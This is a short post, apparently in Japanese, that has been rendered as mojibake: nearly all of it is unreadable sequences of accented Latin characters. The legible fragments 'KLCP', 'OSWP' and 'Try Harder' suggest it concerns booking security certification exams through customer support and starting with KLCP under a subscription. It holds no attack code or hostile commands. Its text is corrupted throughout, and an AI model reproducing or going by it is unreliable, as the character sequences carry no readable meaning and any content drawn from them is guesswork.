ã«ã¹ã¿ãã¼ãµãã¼ãã®æ¹ã«èããçµæã
- KLCPã¯ãã¼ã¿ã«ããäºç´ãã§ããªãã®ã§ãï¼é±éã®ãªã¼ãã¿ã¤ã ãèæ ®ãã¦ãã£ã¡ã«æãã¦ããã
- OSWPã«ã¤ãã¦ã¯ç¾æç¹ã§ã¯äºç´ã§ããªããã©ãããã«ã§ããããã«ãªããã§ããããã«ãªã£ããæããã®ã§å®å¿ãã¦ã
å§ããåããTry Harderã§ããããããããç¹ã§ãè±èªã«æ
£ãã¾ããï½
ãã£ããKLCPããµãã¹ã¯ã®ç¯å²å
ã§åããããã®ã§ãã¾ãã¯ãã¡ãããå§ãããã¨æãã¾ãã